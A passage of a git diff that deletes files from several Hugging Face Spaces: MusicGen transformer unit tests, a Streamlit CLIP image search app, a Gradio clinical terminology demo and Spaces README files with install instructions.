profile(RDBlayer, inputs=(input,)) - print('input shape:', input.shape) - print('parameters:', params/1e6) - print('flops', flops/1e9) - print('output shape', out.shape) diff --git a/spaces/AE-NV/sentiment-productreview/README.md b/spaces/AE-NV/sentiment-productreview/README.md deleted file mode 100644 index 5d340615915583c247a212317517849687cd6acd..0000000000000000000000000000000000000000 --- a/spaces/AE-NV/sentiment-productreview/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Sentiment Productreview -emoji: 😻 -colorFrom: yellow -colorTo: gray -sdk: gradio -sdk_version: 3.18.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py b/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py deleted file mode 100644 index 2bb79bfd58d535469f9b3c56b8a5fe254db5d8ba..0000000000000000000000000000000000000000 --- a/spaces/AIConsultant/MusicGen/tests/modules/test_transformer.py +++ /dev/null @@ -1,253 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. 
- -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import ( - StreamingMultiheadAttention, StreamingTransformer, set_efficient_attention_backend) - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) - tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - for backend in ['torch', 'xformers']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), ((y - y2).norm(), backend) - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. 
- for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - for backend in ['torch', 'xformers']: - torch.manual_seed(1234) - set_efficient_attention_backend(backend) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - frame = x[:, :frame_size] - x = x[:, frame_size:] - outs.append(tr_mem_efficient(frame)) - - out = torch.cat(outs, dim=1) - delta = torch.norm(out - ref) / torch.norm(out) - assert delta < 1e-6, delta - - -def test_cross_attention(): - torch.manual_seed(1234) - for norm_first in [True, False]: - m = StreamingTransformer( - 16, 4, 2, cross_attention=False, norm_first=norm_first, dropout=0., custom=True) - m_cross = StreamingTransformer( - 16, 4, 2, cross_attention=True, norm_first=norm_first, dropout=0., custom=True) - m_cross.load_state_dict(m.state_dict(), strict=False) - x = torch.randn(2, 5, 16) - cross_x = torch.randn(2, 3, 16) - y_ref = m(x) - y_cross_zero = m_cross(x, cross_attention_src=0 * cross_x) - # With norm_first, the two should be exactly the same, - # but with norm_first=False, we get 2 normalization in a row - # and the epsilon value leads to a tiny change. - atol = 0. if norm_first else 1e-6 - print((y_ref - y_cross_zero).norm() / y_ref.norm()) - assert torch.allclose(y_ref, y_cross_zero, atol=atol) - - # We now expect a difference even with a generous atol of 1e-2. - y_cross = m_cross(x, cross_attention_src=cross_x) - assert not torch.allclose(y_cross, y_cross_zero, atol=1e-2) - - with pytest.raises(AssertionError): - _ = m_cross(x) - _ = m(x, cross_attention_src=cross_x) - - -def test_cross_attention_compat(): - torch.manual_seed(1234) - num_heads = 2 - dim = num_heads * 64 - with pytest.raises(AssertionError): - StreamingMultiheadAttention(dim, num_heads, causal=True, cross_attention=True) - - cross_attn = StreamingMultiheadAttention( - dim, num_heads, dropout=0, cross_attention=True, custom=True) - ref_attn = torch.nn.MultiheadAttention(dim, num_heads, dropout=0, batch_first=True) - - # We can load the regular attention state dict - # so we have compat when loading old checkpoints. - cross_attn.load_state_dict(ref_attn.state_dict()) - - queries = torch.randn(3, 7, dim) - keys = torch.randn(3, 9, dim) - values = torch.randn(3, 9, dim) - - y = cross_attn(queries, keys, values)[0] - y_ref = ref_attn(queries, keys, values)[0] - assert torch.allclose(y, y_ref, atol=1e-7), (y - y_ref).norm() / y_ref.norm() - - # Now let's check that streaming is working properly. 
- with cross_attn.streaming(): - ys = [] - for step in range(queries.shape[1]): - ys.append(cross_attn(queries[:, step: step + 1], keys, values)[0]) - y_streaming = torch.cat(ys, dim=1) - assert torch.allclose(y_streaming, y, atol=1e-7) - - -def test_repeat_kv(): - torch.manual_seed(1234) - num_heads = 8 - kv_repeat = 4 - dim = num_heads * 64 - with pytest.raises(AssertionError): - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, cross_attention=True) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat) - mha = StreamingMultiheadAttention( - dim, num_heads, causal=True, kv_repeat=kv_repeat, custom=True) - x = torch.randn(4, 18, dim) - y = mha(x, x, x)[0] - assert x.shape == y.shape - - -def test_qk_layer_norm(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, bias_attn=False) - steps = 12 - x = torch.randn(3, steps, 16) - y = tr(x) - - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., qk_layer_norm=True, cross_attention=True) - z = torch.randn(3, 21, 16) - y = tr(x, cross_attention_src=z) - assert y.shape == x.shape diff --git a/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py b/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py deleted file mode 100644 index a6f2be6f046de45811d1d75a8275794c37ea2d09..0000000000000000000000000000000000000000 --- a/spaces/AIZ2H/06-Streamlit-NLP-Image-Semantic-Search-Images/app.py +++ /dev/null @@ -1,185 +0,0 @@ -from html import escape -import re -import streamlit as st -import pandas as pd, numpy as np -from transformers import CLIPProcessor, CLIPModel -from st_clickable_images import clickable_images - -@st.cache( - show_spinner=False, - hash_funcs={ - CLIPModel: lambda _: None, - CLIPProcessor: lambda _: None, - dict: lambda _: None, - }, -) -def load(): - model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14") - processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14") - df = {0: pd.read_csv("data.csv"), 1: pd.read_csv("data2.csv")} - embeddings = {0: np.load("embeddings.npy"), 1: np.load("embeddings2.npy")} - for k in [0, 1]: - embeddings[k] = embeddings[k] / np.linalg.norm( - embeddings[k], axis=1, keepdims=True - ) - return model, processor, df, embeddings - - -model, processor, df, embeddings = load() -source = {0: "\nSource: Unsplash", 1: "\nSource: The Movie Database (TMDB)"} - - -def compute_text_embeddings(list_of_strings): - inputs = processor(text=list_of_strings, return_tensors="pt", padding=True) - result = model.get_text_features(**inputs).detach().numpy() - return result / np.linalg.norm(result, axis=1, keepdims=True) - - -def image_search(query, corpus, n_results=24): - positive_embeddings = None - - def concatenate_embeddings(e1, e2): - if e1 is None: - return e2 - else: - return np.concatenate((e1, e2), axis=0) - - splitted_query = query.split("EXCLUDING ") - dot_product = 0 - k = 0 if corpus == "Unsplash" else 1 - if len(splitted_query[0]) > 0: - positive_queries = splitted_query[0].split(";") - for positive_query in positive_queries: - match = re.match(r"\[(Movies|Unsplash):(\d{1,5})\](.*)", positive_query) - if match: - corpus2, idx, remainder = match.groups() - idx, remainder = int(idx), remainder.strip() - k2 = 0 if corpus2 == "Unsplash" else 1 - positive_embeddings = concatenate_embeddings( - positive_embeddings, embeddings[k2][idx : idx + 1, :] - ) - if len(remainder) > 0: - positive_embeddings = concatenate_embeddings( - 
positive_embeddings, compute_text_embeddings([remainder]) - ) - else: - positive_embeddings = concatenate_embeddings( - positive_embeddings, compute_text_embeddings([positive_query]) - ) - dot_product = embeddings[k] @ positive_embeddings.T - dot_product = dot_product - np.median(dot_product, axis=0) - dot_product = dot_product / np.max(dot_product, axis=0, keepdims=True) - dot_product = np.min(dot_product, axis=1) - - if len(splitted_query) > 1: - negative_queries = (" ".join(splitted_query[1:])).split(";") - negative_embeddings = compute_text_embeddings(negative_queries) - dot_product2 = embeddings[k] @ negative_embeddings.T - dot_product2 = dot_product2 - np.median(dot_product2, axis=0) - dot_product2 = dot_product2 / np.max(dot_product2, axis=0, keepdims=True) - dot_product -= np.max(np.maximum(dot_product2, 0), axis=1) - - results = np.argsort(dot_product)[-1 : -n_results - 1 : -1] - return [ - ( - df[k].iloc[i]["path"], - df[k].iloc[i]["tooltip"] + source[k], - i, - ) - for i in results - ] - - -description = """ -# Semantic image search -**Enter your query and hit enter** -""" - -howto = """ -- Click image to find similar images -- Use "**;**" to combine multiple queries) -- Use "**EXCLUDING**", to exclude a query -""" - - -def main(): - st.markdown( - """ - """, - unsafe_allow_html=True, - ) - st.sidebar.markdown(description) - with st.sidebar.expander("Advanced use"): - st.markdown(howto) - - - st.sidebar.markdown(f"Unsplash has categories that match: backgrounds, photos, nature, iphone, etc") - st.sidebar.markdown(f"Unsplash images contain animals, apps, events, feelings, food, travel, nature, people, religion, sports, things, stock") - st.sidebar.markdown(f"Unsplash things include flag, tree, clock, money, tattoo, arrow, book, car, fireworks, ghost, health, kiss, dance, balloon, crown, eye, house, music, airplane, lighthouse, typewriter, toys") - st.sidebar.markdown(f"unsplash feelings include funny, heart, love, cool, congratulations, love, scary, cute, friendship, inspirational, hug, sad, cursed, beautiful, crazy, respect, transformation, peaceful, happy") - st.sidebar.markdown(f"unsplash people contain baby, life, women, family, girls, pregnancy, society, old people, musician, attractive, bohemian") - st.sidebar.markdown(f"imagenet queries include: photo of, photo of many, sculpture of, rendering of, graffiti of, tattoo of, embroidered, drawing of, plastic, black and white, painting, video game, doodle, origami, sketch, etc") - - - _, c, _ = st.columns((1, 3, 1)) - if "query" in st.session_state: - query = c.text_input("", value=st.session_state["query"]) - else: - - query = c.text_input("", value="lighthouse") - corpus = st.radio("", ["Unsplash"]) - #corpus = st.radio("", ["Unsplash", "Movies"]) - if len(query) > 0: - results = image_search(query, corpus) - clicked = clickable_images( - [result[0] for result in results], - titles=[result[1] for result in results], - div_style={ - "display": "flex", - "justify-content": "center", - "flex-wrap": "wrap", - }, - img_style={"margin": "2px", "height": "200px"}, - ) - if clicked >= 0: - change_query = False - if "last_clicked" not in st.session_state: - change_query = True - else: - if clicked != st.session_state["last_clicked"]: - change_query = True - if change_query: - st.session_state["query"] = f"[{corpus}:{results[clicked][2]}]" - st.experimental_rerun() - - -if __name__ == "__main__": - main() diff --git a/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py 
b/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py deleted file mode 100644 index 3a2a532354367b122f50cc6f70f4aca4c1e0ff38..0000000000000000000000000000000000000000 --- a/spaces/AIZero2Hero4Health/7-ClinicalTerminologyUIUX-GR/app.py +++ /dev/null @@ -1,327 +0,0 @@ -import pandas_profiling as pp -import pandas as pd -import tensorflow as tf - -from datasets import load_dataset -from tensorflow.python.framework import tensor_shape - -#LOINC -datasetLOINC = load_dataset("awacke1/LOINC-CodeSet-Value-Description.csv", split="train") -#SNOMED: -datasetSNOMED = load_dataset("awacke1/SNOMED-CT-Code-Value-Semantic-Set.csv", split="train") -#eCQM: -dataseteCQM = load_dataset("awacke1/eCQM-Code-Value-Semantic-Set.csv", split="train") - -# map using autotokenizer -from transformers import AutoTokenizer -tokenizer = AutoTokenizer.from_pretrained("bert-base-cased") -dataset = datasetLOINC.map(lambda examples: tokenizer(examples["Description"]), batched=True) -JSONOBJ2=dataset[0] -print(JSONOBJ2) - -sw = datasetLOINC.filter(lambda example: example["Description"].startswith("Allergy")) -len(sw) -print(sw) -print(datasetLOINC) -print(datasetSNOMED) -print(dataseteCQM) - -# play with some dataset tools before the show: - -#print(start_with_ar["Description"]) - -#--- -#Main Stage - Begin! -#--- - -import os -import json -import numpy as np -import gradio as gr - -HF_TOKEN = os.environ.get("HF_TOKEN") -CHOICES = ["SNOMED", "LOINC", "CQM"] -JSONOBJ = """{"items":{"item":[{"id": "0001","type": null,"is_good": false,"ppu": 0.55,"batters":{"batter":[{ "id": "1001", "type": "Regular" },{ "id": "1002", "type": "Chocolate" },{ "id": "1003", "type": "Blueberry" },{ "id": "1004", "type": "Devil's Food" }]},"topping":[{ "id": "5001", "type": "None" },{ "id": "5002", "type": "Glazed" },{ "id": "5005", "type": "Sugar" },{ "id": "5007", "type": "Powdered Sugar" },{ "id": "5006", "type": "Chocolate with Sprinkles" },{ "id": "5003", "type": "Chocolate" },{ "id": "5004", "type": "Maple" }]}]}}""" - - -def profile_dataset(dataset=datasetSNOMED, username="awacke1", token=HF_TOKEN, dataset_name="awacke1/SNOMED-CT-Code-Value-Semantic-Set.csv"): - df = pd.read_csv(dataset.Description) - if len(df.columns) <= 15: - profile = pp.ProfileReport(df, title=f"{dataset_name} Report") - else: - profile = pp.ProfileReport(df, title=f"{dataset_name} Report", minimal = True) - - repo_url = create_repo(f"{username}/{dataset_name}", repo_type = "space", token = token, space_sdk = "static", private=False) - - profile.to_file("./index.html") - - upload_file(path_or_fileobj ="./index.html", path_in_repo = "index.html", repo_id =f"{username}/{dataset_name}", repo_type = "space", token=token) - readme = f"---\ntitle: {dataset_name}\nemoji: ✨\ncolorFrom: green\ncolorTo: red\nsdk: static\npinned: false\ntags:\n- dataset-report\n---" - with open("README.md", "w+") as f: - f.write(readme) - upload_file(path_or_fileobj ="./README.md", path_in_repo = "README.md", repo_id =f"{username}/{dataset_name}", repo_type = "space", token=token) - return f"Your dataset report will be ready at {repo_url}" - -#def lowercase_title(example): -# return {"Description": example[title].lower()} - -# demonstrate map function of dataset -#JSONOBJ_MAP=datasetLOINC.map(lowercase_title) -#JSONOBJ_MAP=datasetLOINC.filter(lambda example: example["Description"].startswith("Mental health")) - - - - -def concatenate_text(examples): - return { - "text": examples["Code"] - + " \n " - + examples["Description"] - + " \n " - + examples["Purpose: Clinical Focus"] - } - -def 
cls_pooling(model_output): - return model_output.last_hidden_state[:, 0] - -def get_embeddings(text_list): - encoded_input = tokenizer( - text_list, padding=True, truncation=True, return_tensors="tf" - ) - encoded_input = {k: v for k, v in encoded_input.items()} - model_output = model(**encoded_input) - return cls_pooling(model_output) - - -def fn( text1, text2, num, slider1, slider2, single_checkbox, checkboxes, radio, dropdown, im1, im2, im3, im4, - video, audio1, audio2, file, df1, df2,): -#def fn( text1, text2, single_checkbox, checkboxes, radio, im4, file, df1, df2,): - - searchTerm = text1 - searchTermSentence = text2 - - start_with_searchTermLOINC = datasetLOINC.filter(lambda example:example["Description"].startswith('Allergy')) #Allergy - - - # FAISS - columns = start_with_searchTermLOINC.column_names - columns_to_keep = ["Value Set Name", "Code", "Description", "Purpose: Clinical Focus", "Code System OID"] - columns_to_remove = set(columns_to_keep).symmetric_difference(columns) - start_with_searchTermLOINC = start_with_searchTermLOINC.remove_columns(columns_to_remove) - start_with_searchTermLOINC - start_with_searchTermLOINC.set_format("pandas") - df = start_with_searchTermLOINC[:] - - df["Purpose: Clinical Focus"][0] - - df4 = df.explode("Purpose: Clinical Focus", ignore_index=True) - df4.head(4) - - from datasets import Dataset - clinical_dataset = Dataset.from_pandas(df4) - clinical_dataset - - clinical_dataset = clinical_dataset.map(lambda x: {"c_length": len(x["Description"].split())}) - - clinical_dataset = clinical_dataset.filter(lambda x: x["c_length"] > 15) - clinical_dataset - - - clinical_dataset = clinical_dataset.map(concatenate_text) - #embedding = get_embeddings(clinical_dataset["text"][0]) - #embedding.shape - - from transformers import AutoTokenizer, TFAutoModel - - model_ckpt = "sentence-transformers/multi-qa-mpnet-base-dot-v1" - tokenizer = AutoTokenizer.from_pretrained(model_ckpt) - model = TFAutoModel.from_pretrained(model_ckpt, from_pt=True) - -# TensorShape([1, 768]) - tf.shape([1, 768]) - - embeddings_dataset = clinical_dataset.map( - lambda x: {"embeddings": get_embeddings(x["text"]).numpy()[0]}) - -# embeddings_dataset.add_faiss_index(column="embeddings") - -# question = "How can I load a dataset offline?" 
-# question_embedding = get_embeddings([question]).numpy() -# question_embedding.shape - -# scores, samples = embeddings_dataset.get_nearest_examples("embeddings", question_embedding, k=5) - -# import pandas as pd - -# samples_df = pd.DataFrame.from_dict(samples) -# samples_df["scores"] = scores -# samples_df.sort_values("scores", ascending=False, inplace=True) - - - # "text": examples["Code"] - # + " \n " - # + examples["Description"] - # + " \n " - # + examples["Purpose: Clinical Focus"] - - -# for _, row in samples_df.iterrows(): -# print(f"Code: {row.Code}") -# print(f"Description: {row.Description}") -# #print(f"Purpose: Clinical Focus: {row.Purpose: Clinical Focus}") -# #print(f"URL: {row.html_url}") -# print("=" * 50) -# print() - - # SNOMED and CQM --------------- - start_with_searchTermSNOMED = datasetSNOMED.filter(lambda example: example["Description"].startswith('Hospital')) #Hospital - start_with_searchTermCQM = dataseteCQM.filter(lambda example: example["Description"].startswith('Telephone')) #Telephone - - print(start_with_searchTermLOINC ) - print(start_with_searchTermSNOMED ) - print(start_with_searchTermCQM) - - #print(start_with_searchTermLOINC["train"][0] ) - #print(start_with_searchTermSNOMED["train"][0] ) - #print(start_with_searchTermCQM["train"][0] ) - - #returnMsg=profile_dataset() - #print(returnMsg) - -# try: - #top1matchLOINC = json.loads(start_with_searchTermLOINC['train']) - #top1matchSNOMED = json.loads(start_with_searchTermSNOMED['train']) - #top1matchCQM = json.loads(start_with_searchTermCQM['train']) -# top1matchLOINC = json.loads(start_with_searchTermLOINC) -# top1matchSNOMED = json.loads(start_with_searchTermSNOMED) -# top1matchCQM = json.loads(start_with_searchTermCQM) -# except: -# print('Hello') - #print(start_with_searchTermLOINC[0]) - #print(start_with_searchTermSNOMED[0] ) - #print(start_with_searchTermCQM[0] ) - - #print(returnMsg) - # print("Datasets Processed") - - return ( - (text1 if single_checkbox else text2) - + ", selected:" - + ", ".join(checkboxes), # Text - { - "positive": num / (num + slider1 + slider2), - "negative": slider1 / (num + slider1 + slider2), - "neutral": slider2 / (num + slider1 + slider2), - }, # Label - (audio1[0], np.flipud(audio1[1])) - if audio1 is not None else os.path.join(os.path.dirname(__file__), "files/cantina.wav"), # Audio - np.flipud(im1) - if im1 is not None else os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), # Image - video - if video is not None else os.path.join(os.path.dirname(__file__), "files/world.mp4"), # Video - [ - ("The", "art"), - ("quick brown", "adj"), - ("fox", "nn"), - ("jumped", "vrb"), - ("testing testing testing", None), - ("over", "prp"), - ("the", "art"), - ("testing", None), - ("lazy", "adj"), - ("dogs", "nn"), - (".", "punc"), - ] + [(f"test {x}", f"test {x}") for x in range(10)], # HighlightedText - [ - ("The testing testing testing", None), - ("over", 0.6), - ("the", 0.2), - ("testing", None), - ("lazy", -0.1), - ("dogs", 0.4), - (".", 0), - ] + [(f"test", x / 10) for x in range(-10, 10)], # HighlightedText - #json.loads(JSONOBJ), # JSON - start_with_searchTermLOINC.to_json(orient="records", path_or_buf="None"), - #json.dumps(json.loads(start_with_searchTermLOINC['train'].to_json(orient="records", path_or_buf="None"))), - "", # HTML - os.path.join(os.path.dirname(__file__), "files/titanic.csv"), - df1, # Dataframe - np.random.randint(0, 10, (4, 4)), # Dataframe - df2, # Timeseries - ) - - - -demo = gr.Interface( - fn, - inputs=[ - gr.Textbox(value="Allergy", 
label="Textbox"), - gr.Textbox(lines=3, value="Bathing", placeholder="Type here..", label="Textbox 2"), - gr.Number(label="Number", value=42), - gr.Slider(10, 20, value=15, label="Slider: 10 - 20"), - gr.Slider(maximum=20, step=0.04, label="Slider: step @ 0.04"), - gr.Checkbox(label="Check for NER Match on Submit"), - gr.CheckboxGroup(label="Clinical Terminology to Check", choices=CHOICES, value=CHOICES[0:2]), - gr.Radio(label="Preferred Terminology Output", choices=CHOICES, value=CHOICES[2]), - gr.Dropdown(label="Dropdown", choices=CHOICES), - gr.Image(label="Image"), - gr.Image(label="Image w/ Cropper", tool="select"), - gr.Image(label="Sketchpad", source="canvas"), - gr.Image(label="Webcam", source="webcam"), - gr.Video(label="Video"), - gr.Audio(label="Audio"), - gr.Audio(label="Microphone", source="microphone"), - gr.File(label="File"), - gr.Dataframe(label="Filters", headers=["Name", "Age", "Gender"]), - gr.Timeseries(x="time", y=["price", "value"], colors=["pink", "purple"]), - ], - outputs=[ - gr.Textbox(label="Textbox"), - gr.Label(label="Label"), - gr.Audio(label="Audio"), - gr.Image(label="Image"), - gr.Video(label="Video"), - gr.HighlightedText(label="HighlightedText", color_map={"punc": "pink", "test 0": "blue"}), - gr.HighlightedText(label="HighlightedText", show_legend=True), - gr.JSON(label="JSON"), - gr.HTML(label="HTML"), - gr.File(label="File"), - gr.Dataframe(label="Dataframe"), - gr.Dataframe(label="Numpy"), - gr.Timeseries(x="time", y=["price", "value"], label="Timeseries"), - ], - examples=[ - [ - "Allergy", - "Admission", - 10, - 12, - 4, - True, - ["SNOMED", "LOINC", "CQM"], - "SNOMED", - "bar", - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/cheetah1.jpg"), - os.path.join(os.path.dirname(__file__), "files/world.mp4"), - os.path.join(os.path.dirname(__file__), "files/cantina.wav"), - os.path.join(os.path.dirname(__file__), "files/cantina.wav"), - os.path.join(os.path.dirname(__file__), "files/titanic.csv"), - [[1, 2, 3], [3, 4, 5]], - os.path.join(os.path.dirname(__file__), "files/time.csv"), - ] - ] - * 3, - theme="default", - title="⚗️🧠🔬🧬 Clinical Terminology Auto Mapper AI 👩‍⚕️🩺⚕️🙋", - cache_examples=False, - description="Clinical Terminology Auto Mapper AI", - article="Learn more at [Yggdrasil](https://github.com/AaronCWacker/Yggdrasil)", -# live=True, -) - -if __name__ == "__main__": - demo.launch(debug=True) \ No newline at end of file diff --git a/spaces/AbandonedMuse/UnlimitedMusicGen/README.md b/spaces/AbandonedMuse/UnlimitedMusicGen/README.md deleted file mode 100644 index 6734acc69a56783d44247195e30dd926376db6d3..0000000000000000000000000000000000000000 --- a/spaces/AbandonedMuse/UnlimitedMusicGen/README.md +++ /dev/null @@ -1,210 +0,0 @@ ---- -title: UnlimitedMusicGen -emoji: 🎼 -colorFrom: white -colorTo: red -sdk: gradio -sdk_version: 3.38.0 -app_file: app.py -pinned: false -license: creativeml-openrail-m -tags: -- musicgen -- unlimited -duplicated_from: Surn/UnlimitedMusicGen ---- - -[arxiv]: https://arxiv.org/abs/2306.05284 -[musicgen_samples]: https://ai.honu.io/papers/musicgen/ -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - -# UnlimitedMusicGen -This is my modification of the Audiocraft project to enable unlimited Audio generation. I have added a few features to the original project to enable this. 
I have also added a few features to the gradio interface to make it easier to use. - -# Audiocraft -![docs badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_docs/badge.svg) -![linter badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_linter/badge.svg) -![tests badge](https://github.com/facebookresearch/audiocraft/workflows/audiocraft_tests/badge.svg) - -Audiocraft is a PyTorch library for deep learning research on audio generation. At the moment, it contains the code for MusicGen, a state-of-the-art controllable text-to-music model. - -## MusicGen - -Audiocraft provides the code and models for MusicGen, [a simple and controllable model for music generation][arxiv]. MusicGen is a single stage auto-regressive -Transformer model trained over a 32kHz EnCodec tokenizer with 4 codebooks sampled at 50 Hz. Unlike existing methods like [MusicLM](https://arxiv.org/abs/2301.11325), MusicGen doesn't require a self-supervised semantic representation, and it generates -all 4 codebooks in one pass. By introducing a small delay between the codebooks, we show we can predict -them in parallel, thus having only 50 auto-regressive steps per second of audio. -Check out our [sample page][musicgen_samples] or test the available demo! - - - Open In Colab - - - Open in HugginFace - -
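-
-The codebook delay mentioned above can be pictured with a tiny, purely illustrative NumPy sketch (this is not Audiocraft code; `T`, `K` and the pad value are made up): each codebook stream is shifted one extra step to the right, so a single autoregressive pass over the shifted grid fills in all 4 codebooks in parallel.
-
-```python
-import numpy as np
-
-T, K, PAD = 6, 4, -1                    # frames, codebooks, pad token (illustrative values)
-codes = np.arange(T * K).reshape(K, T)  # stand-in for EnCodec tokens, one row per codebook
-delayed = np.full((K, T + K - 1), PAD)
-for k in range(K):
-    delayed[k, k:k + T] = codes[k]      # codebook k starts k steps later
-print(delayed)                          # each column = tokens predicted at the same step
-```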
- -We use 20K hours of licensed music to train MusicGen. Specifically, we rely on an internal dataset of 10K high-quality music tracks, and on the ShutterStock and Pond5 music data. - -## Installation -Audiocraft requires Python 3.9, PyTorch 2.0.0, and a GPU with at least 16 GB of memory (for the medium-sized model). To install Audiocraft, you can run the following: - -```shell -# Best to make sure you have torch installed first, in particular before installing xformers. -# Don't run this if you already have PyTorch installed. -pip install 'torch>=2.0' -# Then proceed to one of the following -pip install -U audiocraft # stable release -pip install -U git+https://git@github.com/facebookresearch/audiocraft#egg=audiocraft # bleeding edge -pip install -e . # or if you cloned the repo locally -``` - -## Usage -We offer a number of way to interact with MusicGen: -1. A demo is also available on the [`facebook/MusicGen` HuggingFace Space](https://huggingface.co/spaces/facebook/MusicGen) (huge thanks to all the HF team for their support). -2. You can run the Gradio demo in Colab: [colab notebook](https://colab.research.google.com/drive/1-Xe9NCdIs2sCUbiSmwHXozK6AAhMm7_i?usp=sharing). -3. You can use the gradio demo locally by running `python app.py`. -4. You can play with MusicGen by running the jupyter notebook at [`demo.ipynb`](./demo.ipynb) locally (if you have a GPU). -5. Checkout [@camenduru Colab page](https://github.com/camenduru/MusicGen-colab) which is regularly - updated with contributions from @camenduru and the community. -6. Finally, MusicGen is available in 🤗 Transformers from v4.31.0 onwards, see section [🤗 Transformers Usage](#-transformers-usage) below. - -### More info about Top-k, Top-p, Temperature and Classifier Free Guidance from ChatGPT -6. Finally, MusicGen is available in 🤗 Transformers from v4.31.0 onwards, see section [🤗 Transformers Usage](#-transformers-usage) below. - - -Top-k: Top-k is a parameter used in text generation models, including music generation models. It determines the number of most likely next tokens to consider at each step of the generation process. The model ranks all possible tokens based on their predicted probabilities, and then selects the top-k tokens from the ranked list. The model then samples from this reduced set of tokens to determine the next token in the generated sequence. A smaller value of k results in a more focused and deterministic output, while a larger value of k allows for more diversity in the generated music. - -Top-p (or nucleus sampling): Top-p, also known as nucleus sampling or probabilistic sampling, is another method used for token selection during text generation. Instead of specifying a fixed number like top-k, top-p considers the cumulative probability distribution of the ranked tokens. It selects the smallest possible set of tokens whose cumulative probability exceeds a certain threshold (usually denoted as p). The model then samples from 